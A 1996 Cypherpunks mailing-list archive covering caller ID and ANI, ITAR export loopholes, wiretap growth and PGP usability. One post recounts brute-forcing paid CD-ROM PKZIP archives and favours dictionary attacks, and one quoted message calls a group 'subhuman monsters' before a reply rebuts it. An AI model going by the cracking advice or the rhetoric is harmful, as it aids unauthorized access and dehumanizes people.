Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
never again call an 800 number anonymously to get information about
something unless I go out to a pay phone.  What an incredible
inconvenience, and how truly depressing.

I know 800 number owners probably used to be able to get lists of
calling phone numbers on their phone bills, but this is less
disturbing as it would take significant effort to match up the lists
after the fact.  I just want to be able to call up companies and say,
for instance, "If I buy your product, can it do X?" as opposed to, for
instance, "I'm stuck with your product, can it do X?".  People are
often more helpful in the former case.  Now, though, they'll know
exactly who I am before they even say hello.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Sat, 13 Jul 1996 13:41:24 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: "White 'Punks on Dope" (w apologies to The Tubes)
In-Reply-To: <snow@smoke.suba.com>
Message-ID: <199607121858.LAA08190@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 11, 11:15pm, snow wrote:
> > man is just ridiculous, & betrays the author's lack of knowledge.
> 
>      No, the POINT IS MIS-DIAGNOSIS. Children who are either brighter 
> than their classmates and figured out the assignement with in minutes 

These are not the people who are being talked about here

> of the teacher giving it, or children with _no_ boundries implemented 
> by their parents (people are like fractals, very subject to initial 
> conditions) hence they keep pushing and pushing so the parents respond
> by instituting chemical control.

Well, like I said earlier, in the old days very hyperactive boys 
probably did have the tar whipped out of them.  This does work,
for short periods.   In the long run, it's ineffective.  Totally
ineffective for a medical condition.  Do you think, for example,
that it is effective to tell a person suffering from depression
to "cheer up", or someone suffering from some forms of schizophrenia
to "ignore the voices & stop acting silly"?  No amount of your cajoling
is going to get a person with a heart deficiency up El Capitan, & 
there's no chance you can guilt trip someone with severe emphysema to run
a marathon with you.

I'm sure there's plenty of misdiagnoses, but unless you're willing
to lay your md or your epidemiological credentials on the table,
I'm not giving you any credit.  Your argument sounds like some kind
of reactionary victorian moralizing to me (parents setting boundaries
.... sheesh).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 08:35:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Destabilizing China's Government with Strong Crypto
Message-ID: <199607121626.MAA29430@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 0:04, Timothy C. May wrote:
[..]
> And this is yet another example of the negative effects of the U.S.
> restrictions on crypto export: where widespread crypto tools might be used
> to destabilize repressive governments, the lack of these tools integrated
> into common applications makes it harder for freedom-fighters in China,
> Burma, Iran, France, etc., to use them.

The US has a sad history of supporting its own 'friendly dictators' 
though.  Makes it hard to support flow of decentralizing tech to 
destabalize countries like Iraq but keep countries like El Salvador 
in the fold.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Jul 1996 12:48:36 +0800
To: Will Rodger <cypherpunks@toad.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <199607121939.MAA03832@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 7/12/96 -0400, Will Rodger wrote:

>>As I see it, the most important issue is not the legal status of the one 
>>actually doing the export/mailing, but in fact the organization which is the 
>>recipient and thus, the beneficiary of this act.  _THAT_ organization will 
>>be well-identified, yet will not have done anything obviously illegal.  Is 
>>there any indication that Baker was trying to distinguish between the one 
>>physically mailing it, and those receiving it?
>
>Yup. He was speaking only of the US company.

Any indication about what the USG might be able to do, SPECIFICALLY, legally 
or in retaliation?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Sat, 13 Jul 1996 15:14:08 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Can't block caller ID in Massachusetts?
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960712194020Z-14987@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


What's worse, is that if you just want to call and get information about
a particular product, they can log you for their marketing database. 

>----------
>From: 	David Mazieres[SMTP:dm@amsterdam.lcs.mit.edu]
>Sent: 	Friday, July 12, 1996 8:55 AM
>To: 	cypherpunks@toad.com
>Subject: 	Can't block caller ID in Massachusetts?
>
>My last phone bill said that Nynex is now giving out people's names in
>addidtion to their phone numbers over caller-id.  I therefore called
>Nynex and told them to block caller-id on my phone line.
>
>They said no problem, but...  They said nothing I can do will block it
>when I call 800 numbers.  "The people with 800 numbers have special
>software, and there is nothing you can do to block your identity when
>calling them.  Not even *67."
>
>Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
>never again call an 800 number anonymously to get information about
>something unless I go out to a pay phone.  What an incredible
>inconvenience, and how truly depressing.
>
>I know 800 number owners probably used to be able to get lists of
>calling phone numbers on their phone bills, but this is less
>disturbing as it would take significant effort to match up the lists
>after the fact.  I just want to be able to call up companies and say,
>for instance, "If I buy your product, can it do X?" as opposed to, for
>instance, "I'm stuck with your product, can it do X?".  People are
>often more helpful in the former case.  Now, though, they'll know
>exactly who I am before they even say hello.
>
>David
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 13 Jul 1996 12:39:10 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <Pine.SUN.3.91.960712124831.12478A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 12 Jul 1996, David Mazieres wrote:

> [Nynex] said nothing I can do will block [Caller ID] when I
> call 800 numbers...
> 
> Wow.  Maybe I'm not paranoid enough, but I never expected this. 
> I can never again call an 800 number anonymously to get
> information about something unless I go out to a pay phone. 

I've discussed this before, but it makes a lie of all those
narc lines that advertise, "We don't want your name, bust the
drug dealer's."  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Jul 1996 09:14:00 +0800
To: cypherpunks@toad.com
Subject: Re: Can the inevitability of Software privacy be used to   defeat the ITAR?
In-Reply-To: <ae0b08f5010210048875@[205.199.118.202]>
Message-ID: <Pine.LNX.3.94.960712130335.171A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 11 Jul 1996, Timothy C. May wrote:

> Go back an read Hal Abelson's message of just a few days ago. MIT may lose
> out on a large contract with Sandia becuase of their publishing of a _book_
> containing PGP code.

This isn't quite analogous to the original problem of a software company making
good-faith efforts to prevent a program from being exported.  AFAIK, MIT did
not try to prevent the book from being exported (of course, the State
Department never did approve or deny their request to export the book).  Sandia
could claim that MIT came very close to violating ITAR, but the same claim
could not be made if the issue was a software program which was
export-controlled.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeaGe7Zc+sv5siulAQFlSAP6Aw58y4rg9Bk93ru2kw5RzmLVX3KvNKbY
Pie33MR+NT0FB6C7deUEru7pHQVsRkOFAgLIwqiltSFa7MtpxCEySHRguOWxg7yf
u1bANeZ1Snrm2cwo72KLH9utgSE+JwaKW2MSLADHnPUQUbUnE45lY2qx9LcmNvcz
43t14d8RhC4=
=zUl/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@McGlashan.com>
Date: Sat, 13 Jul 1996 14:51:47 +0800
To: Law &amp; Policy of Computer Communications              <CYBERIA-L@LISTSERV.AOL.COM>
Subject: Re: Can the inevitability of Software privacy be used to defeat the              ITAR? (fwd)
Message-ID: <199607122035.NAA22343@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:38 AM 7/11/96 -0400, Michael Froomkin wrote:
>Here's a fun legal issue that cropped up on the cypherpunks list

Nice try, but no cigar.  The problem with all of the "ITAR loophole" ideas
is that they only work where the rules are clearly articulated and carefully
followed by the administrative agencies.  Neither of those exist with the
ITAR..  There are no restrictions on the ODTC's ability to interpret the
ITAR however they see fit and to change those interpretations as they wish
to meet their goal: stopping folks from getting strong crypto easily.  

The best example of this is the mislabelled "crypto with a hole,"  in which
ODTC interprets the regulations as allowing them to limit software with no
cryptography in it at all but only hooks which could allow the insertion of
crypto later.  The ITAR says that they only regulate "software with the
capability of maintaining secrecy" and so on its face would not extend to
software which only has hooks for crypto.  But this doesn't stop ODTC and
there is no mechanism in place to allow anyone else to  stop them short of a
lawsuit or a change in the law by Congress.

So, having said that, here's where I think they could fit in the "piracy"
sublicense maneuver:

First, entering into the sublicensing agreement could be interpreted as a
"defense service."  By giving them a license you are "assisting the foreign
person" because, presumably, life is easier for them if they have a license.

Second, call the sub-license agreement "technical data" since it is related
to the crypto.

Or, as they did with Zimmermann, they just assume that the company had
something to do with the unauthorized export and begin an investigation.  If
it goes to indictment, better hope you have iron-clad evidence to convince
the jury that you had nothing to do with it.  If  you've gone ahead and
sub-licensed afterwards, making money off of the illegal act, I think it
would be difficult to convince a jury that you didn't have something to do
with it.  

Gotta write a brief now,

Cindy Cohn


>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law |
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's hot here.  And humid.
>
>---------- Forwarded message ----------
>Date: Thu, 11 Jul 1996 04:06:05 +0000
>>From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
>To: cypherpunks mailing list <cypherpunks@toad.com>
>Subject: Can the inevitability of Software privacy be used to defeat the ITAR?
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>All software companies who sell (really licence) software
>must deal with the inevitability of software piracy. It
>is a brute fact that any usefully product sold in the U.S.
>will eventually appear as an unauthorized copy for sale
>abroad. This fact must be recognized in the software companies'
>business plan.
>
>The question occurs to me "why can not this fact be used to
>defeat the ITAR?"
>
>What is to prevent a U.S company to licence a foreign company
>to sublicence and distribute a Crypto product abroad, if that
>foreign company obtains that product on the pirate market?
>
>I am not a lawyer, but I look at the definition of "export"
>on page 612 of Applied Cryptography and nothing seems to
>obviously apply.
>
>The scenario I imagine is this: U.S. company produces a crypto
>product. To be generally useful, the product supports all languages.
>(Those CDROMs really do hold a lot of data.)
>After all, Americans do need to do business with foreigners.
>The company licences and distributes the product in the U.S.
>taking special care not to distribute the product to any foreign persons.
>When inevitability, the product appears in the pirate market outside
>the U.S., the company makes a contract with a foreign company
>allowing it to distribute it and sublicence it. The foreign company
>can get their copy from the pirate market, being authorized to get
>the copy by the U.S. company. When this deal is cut copies
>have already been exported and are already being sold by the
>pirates, against the will of the U.S. company.
>
>In this scenario, the U.S. company had done everything
>it possibly could to prevent the illegal export of its product. But
>when its efforts have inevitably failed, it makes money by
>sublicencing.
>
>When I look at the definition of Export on page 612 of applied
>cryptography, I see one clause that defines transferring registration
>as export, but only for aircraft, vessels and satellites.
>
>OK, cypherpunk legal types, there has got to be something wrong
>with this idea. There are a lot of smart people in the world,
>so if this idea was good, somebody else would have thought of
>it before now! But what is specifically is wrong with it?
>I want to be educated!
>
>- --
>Paul Elliott                                  Telephone: 1-713-781-4543
>Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner
#224
>                                              Houston Texas 77063
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3
>Charset: cp850
>
>iQCVAgUBMeR9nvBUQYbUhJh5AQGkYAP/bN0lmkjF6uZ92MmWIqdZwVmLmsiIUg9L
>XbtYaeawNCMdi2BnkDUu4j/G1rNngFuAmRwABE9UxKOnwjMU5lfmxHev5RP9/CBF
>81AnYc1bWeh52EuKJCKu47LMDn9PqfiCIGBwfRehgkZ72gO0+ywIP1fZrkwNNCF+
>Md76LqUE5Z4=
>=k7M5
>-----END PGP SIGNATURE-----
>
>
************************ 
Cindy A. Cohn                                                               
McGlashan & Sarrail, P. C.
177 Bovet Road, 6th Floor                                            
San Mateo, CA  94402
(415) 341-2585 (tel)
(415)341-1395 (fax)
Cindy@McGlashan.com
http://www.McGlashan.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Sat, 13 Jul 1996 16:41:54 +0800
To: dm@amsterdam.lcs.mit.edu
Subject: Re: Can't block caller ID in Massachusetts?
Message-ID: <199607122035.NAA15917@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



David Mazieres writes:

> My last phone bill said that Nynex is now giving out people's names in
> addidtion to their phone numbers over caller-id.  I therefore called
> Nynex and told them to block caller-id on my phone line.
> 
> They said no problem, but...  They said nothing I can do will block it
> when I call 800 numbers.  "The people with 800 numbers have special
> software, and there is nothing you can do to block your identity when
> calling them.  Not even *67."
> 
> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.
> 
> I know 800 number owners probably used to be able to get lists of
> calling phone numbers on their phone bills, but this is less
> disturbing as it would take significant effort to match up the lists
> after the fact.  I just want to be able to call up companies and say,
> for instance, "If I buy your product, can it do X?" as opposed to, for
> instance, "I'm stuck with your product, can it do X?".  People are
> often more helpful in the former case.  Now, though, they'll know
> exactly who I am before they even say hello.
> 
> David

800 (And 888/900 etc.) numbers use a different mechanism (ANI) than caller
ID to provide your telephone number to the person you are calling.  This
has been around far longer than caller ID, and really doesn't have all that
much to do with the caller ID service, which is entirely different.

So in essence, nothing's really changed with regard to 800 numbers, except
that people are now becoming _aware_ that the called party has access to
their telephone number.

If you want additional information, I'd recommend starting with the FAQ
for the alt.2600 newsgroup.

Dana W. Albrecht
dwa@corsair.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Sat, 13 Jul 1996 10:52:49 +0800
To: cypherpunks@toad.com
Subject: Wiretaps
Message-ID: <199607122042.NAA16159@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




Wiretaps Up Sharply in Clinton Administration

WASHINGTON (Reuter) - The Clinton administration has sharply increased use
of federal telephone wiretaps and other electronic surveillance in the
United States since taking office, The Washington Post reported Sunday. 

...

Civil rights and privacy advocates were upset with the trend but unable to
do much about it ...

Frederick Ness, who runs the Justice Department office that approves
applications for court-ordered wiretaps, told the Post: ``We are up 30 to
40 percent this year.'' 

In 1992, the last year of the Bush administration, there were 340 federal
court orders permitting electronic surveillance in criminal cases, the
newspaper said. Quoting unidentified officials, the report said that
number had risen to 672 last year and almost certainly would exceed 700 in
1996. 

The figures did not include ``national security'' wiretap orders, obtained
under intelligence legislation, which also had been rising dramatically,
the Post said. 

Preparing for expected continued growth in surveillance of domestic
criminals, the Justice Department was buying additional high-tech
equipment, developing new eavesdropping techniques and adding support
personnel, the report said. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: t byfield <tbyfield@panix.com>
Date: Sat, 13 Jul 1996 14:10:19 +0800
To: cypherpunks@toad.com
Subject: Re: Destabilizing China's Government with Strong Crypto
Message-ID: <v03007602ae0c52e602ab@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 PM +0000 on 7/12/96, Deranged Mutant wrote:


> On 12 Jul 96 at 0:04, Timothy C. May wrote:
> [..]
> > And this is yet another example of the negative effects of the U.S.
> > restrictions on crypto export: where widespread crypto tools might be used
> > to destabilize repressive governments, the lack of these tools integrated
> > into common applications makes it harder for freedom-fighters in China,
> > Burma, Iran, France, etc., to use them.
>
> The US has a sad history of supporting its own 'friendly dictators'
> though.  Makes it hard to support flow of decentralizing tech to
> destabalize countries like Iraq but keep countries like El Salvador
> in the fold.

	Me too. In fact, citing "freedom fighters" to justify relaxing ITAR is
neither more nor less disingenuous than citing "international arms traders"
to justify maintaining or tightening it; and given the litany of imbecilic,
corrupt, rump, and reactionary regimes and factions the US has supported
over the past decades, it isn't exactly going to win over hearts and minds
in the agencies that have a strong hand in ITAR.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rsc.anu.edu.au>
Date: Fri, 12 Jul 1996 21:21:28 +0800
To: cypherpunks@toad.com
Subject: Irony on strong encryption in Australia
Message-ID: <199607120421.VAA17567@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> The Australian Broadcasting Authority's report on Internet regulation issues
> recommends that ISPs be required to support unescrowed strong encryption for
> their users' privacy and security.
> 
> Electronic Frontiers Australia is opposed to this idea because it puts too
> much of a burden on the ISP.

Are you sure you have this right. I've just joined the EFA, and am concerned 
about this, but I can't find any such comment on the EFA site.

The relevant portion of the ABA document is as follows

"The ABA considers that users with particular requirements for privacy 
should be able to obtain advice from their service providers
on the use of encryption and the availability of suitable products to 
render messages unreadable by unauthorised persons."

This is hardly a huge burden and I would be surprised if the EFA objects
to it. I looked at their press release concerning the ABA report but saw
no mention of any problems with this "encryption advice" policy. Maybe
I'm looking in the wrong place?

Anyway, the main problem for the EFA at the moment is the "Son of CDA" 
legislation
currently being proposed by the NSW attorney-general.

Sherry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Sat, 13 Jul 1996 14:44:39 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <1.5.4.32.19960712190524.00663184@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>As I see it, the most important issue is not the legal status of the one 
>actually doing the export/mailing, but in fact the organization which is the 
>recipient and thus, the beneficiary of this act.  _THAT_ organization will 
>be well-identified, yet will not have done anything obviously illegal.  Is 
>there any indication that Baker was trying to distinguish between the one 
>physically mailing it, and those receiving it?

Yup. He was speaking only of the US company. As you mentioned, odds of anyone 
getting caught are fairly low in many cases, but even lower for anyone
outside the US.
 The odds the US would go after a foreign company would seem pretty remote,
unless
 based in a country that strongly suppported US policy. The UK comes to
mind, but few
 others. I'll leave it others to decide who else should be on that list.


Will
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMebLF0cByjT5n+LZAQF3Owf5AbJCUK/9sbaUGDVV4eZcqggSuOgH+ubr
fbx3W7HXaXcAlqvATFRt+mw5h6GMubNrRCC+Ka6CJYC60QESWnHCw8/XX000I2UQ
ucBwRMTID+KZuNHN9vD4/hE+JBLkWDQyu2S4IDWkCR0+7UJDFQQ9z3kSVmqgczlB
jGyOtUwVpNHETg0yGreuQVCMz6gzxX1eZf0Hv38BJQqD8ROOLVCmYC1grRlrltRV
VJqRohsVustzqgu35OoKKzZES3hJxqvmXaNHIDMKhZmnbeHiZeAKs0tQ9hJz7Znp
oNAGcwIugB7S7mANIr6bd0EPHiljOP2Ipe13LgMAtkhidipTDQgtRQ==
=6+G6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Jul 1996 10:28:12 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Ritalinpunks
Message-ID: <Pine.LNX.3.94.960712151859.459A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just got the latest issue of Scientific American, and interestingly enough,
there is an article on page 12 that deals with the issue of overdiagnosing
ADD.  It's pretty interesting reading for anyone that may have an opinion on
the subject (which is definitely a high number of cpunks).

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeamMLZc+sv5siulAQFBYAP/UJkevlONxJywp0MsNQ0c9UwfKb7cZQgs
8F0BfVSAn31zatJ9lchNVo8ui57ojmbbdBBPGKtr2EqPgkheFGbVwn26fcZmfJ1b
8h4hq715hi+6bokrdrtIgXTGDT/lWt7FTQ01nB/VLgClB8h/X2gSQSCeXIJename
Nh+liBowdKY=
=kfcI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 04:52:22 +0800
To: cypherpunks@toad.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <1.5.4.32.19960712133842.008c3308@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 AM 7/7/96 +0200, you wrote:
>
>Which is where the small payments to ratings producers from
>ratings consumers comes in.  Again this is just the
>quantification of a phenomena that we all take for granted.
>(Namely, that people who produce quality ratings are producing a
>value and trading/contributing it to others.)

It sure sounds like I'll have to pay, so someone decides for me, wether some
piece of info is important to me. Now, if that isn't the first step to
censorship!

That kind of reminds me of an insurance company where I can call a
toll-intensive number to talk to a salesman who tries to sell my something I
don't really need.
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 04:50:35 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <1.5.4.32.19960712133845.008dc610@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


>While the guys fighting the Israelis in Lebanon are more or
>less honorable men who fight according to the laws of war,
>the Islamic fundamentalists in Algeria are simply vicious subhuman 
>monsters who deserve to die, each and every one, and their pals in 
>Egypt and the Sudan are not much better.

I hope you're not serious.

In case you are:
It seems to be typical of American beliefs that Israelis are good, and
everybody else "down there" is bad. On the other hand, Israel wouldn't stand
a chance if US weren't having them as a pet. They are getting more and more
fundamentalistic (yes, there are zionistic fundamentalists, big surprise)
and they are not one bit better than anyone around.

It seems to me, that a few hothead terrorists create the image of all arabic
people in western heads. Consider this: Islam is a lot younger then
Christianity. If the Islamic people act like the Christian people we will
have a huge problem. A few hundred years ago everybody who didn't agree with
the pope was killed (Earth is flat after all). Now, according to my
timekeeping, Islam should reach that state around 2100. So there is plenty
of time for them to get nastier. (I don't think they will, because Islam is
a bit more tolerant than christianity ever was).

ps: I'm not Islamic, nor will I ever be, but I don't like fundamentalists,
and your views, should they be serious, sound *VERY* fundamentalist to me.

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 04:52:29 +0800
To: cypherpunks@toad.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <1.5.4.32.19960712133847.008dd9e0@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 AM 7/7/96 +0200, you wrote:
>
>Which is where the small payments to ratings producers from
>ratings consumers comes in.  Again this is just the
>quantification of a phenomena that we all take for granted.
>(Namely, that people who produce quality ratings are producing a
>value and trading/contributing it to others.)

It sure sounds like I'll have to pay, so someone decides for me, wether some
piece of info is important to me. Now, if that isn't the first step to
censorship!

That kind of reminds me of an insurance company where I can call a
toll-intensive number to talk to a salesman who tries to sell my something I
don't really need.
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 04:19:50 +0800
To: cypherpunks@toad.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <1.5.4.32.19960712133849.008deab8@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 7/6/96 +0200, you wrote:
>
>Let me know.  We _could_ adopt the ridiculously simple NoCeM
>protocol, or the ever-mutating public key certificates being
>designed in a nearby mailing list, or some protocol of our own.
>(Shouldn't be too hard to come up with an implementable, useful
>protocol.)
>
Hey guys, as long as I can't get a decent mail program that handles all
pgp-stuff automatically (including the cumbersome installation), I don't
think pgp-awareness is of much use in "everyday communication programms")
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 13 Jul 1996 05:07:53 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <1.5.4.32.19960712133856.008dfb10@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 03:51 PM 7/6/96 -0400, you wrote:
> > AwakenToMe@aol.com writes:
> > > I have a util that will create a word list starting from
> > > aaaaaaaaaaa on up to anythingggggggg basically you could do every
> > > combination. Let me know if ya want it.
> > 
> > That would really be of great use for doing wordlist crack runs. It
> > must have taken you a long time to write -- generous of you to offer
> > it.

I don't think any decent programmer has never tried such an aproach to crack
for example PKZIP archives (the one on CD-ROMs, where you have to pay to get
the passwords). I certainly did back in 1991. I don't want to put down the
usefullness of such a program, but since probably more than 50% of all
passwords are vulnerable to dictionary attacks, such a utility has not too
much value. (have you ever tried all combinations from "aaaaaa" to "zzzzzz"
(there are around 2'176'782'336 <36^6> if you concider all umlauts like the
German auml;, uuml;, ouml;, ...). On the other hand, there won't be much
more than 10'000 6-letter words in any dictionary.

So it seems, a wordlist generator and a wordlist using cracker works a lot
better (and is almost as trivial to do - if you keep aside nice features)

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 13 Jul 1996 12:43:59 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <m0ueo3G-0001qwC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


David Mazieres enscribed thusly:

> My last phone bill said that Nynex is now giving out people's names in
> addidtion to their phone numbers over caller-id.  I therefore called
> Nynex and told them to block caller-id on my phone line.

> They said no problem, but...  They said nothing I can do will block it
> when I call 800 numbers.  "The people with 800 numbers have special
> software, and there is nothing you can do to block your identity when
> calling them.  Not even *67."

	Might want to poke your nose into the comp.dcom.telecom newsgroup.
This is very VERY old news.  The people with 800 (and 900) numbers don't
have special software - they have a different service.  Instead of CLID,
they have ANI and have had it for YEARS!  One particular difference between
these two services is that CLID returns the "calling number" while ANI
returns the "billing number" (i.e. they number they would charge services
to).  For most of us, these numbers are identical.  For some of us, they
are different.

> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.

	You are about a decade late on this one...

> I know 800 number owners probably used to be able to get lists of
> calling phone numbers on their phone bills, but this is less
> disturbing as it would take significant effort to match up the lists
> after the fact.  I just want to be able to call up companies and say,
> for instance, "If I buy your product, can it do X?" as opposed to, for
> instance, "I'm stuck with your product, can it do X?".  People are
> often more helpful in the former case.  Now, though, they'll know
> exactly who I am before they even say hello.

	Not everyone has the ANI service but not all of those who do will
admit to it.  The story is told of an American Express customer who got
extremely agitated after an American Express customer support representative
asked them if they has recently changed their phone number.  The answer was
"no - why do you ask".  The rep replied, "well, the number you're calling
from is different".  The customer got so upset that American Express no longer
asks when someone calls in from a number different than the number on file.

	This is also how you unlock those credit cards by calling an 800
number.  They warn you to call from your home number.  If you do, your card
is automagically activated.  If you don't, you have to jump through hoops.

> David

	Mike
-- 
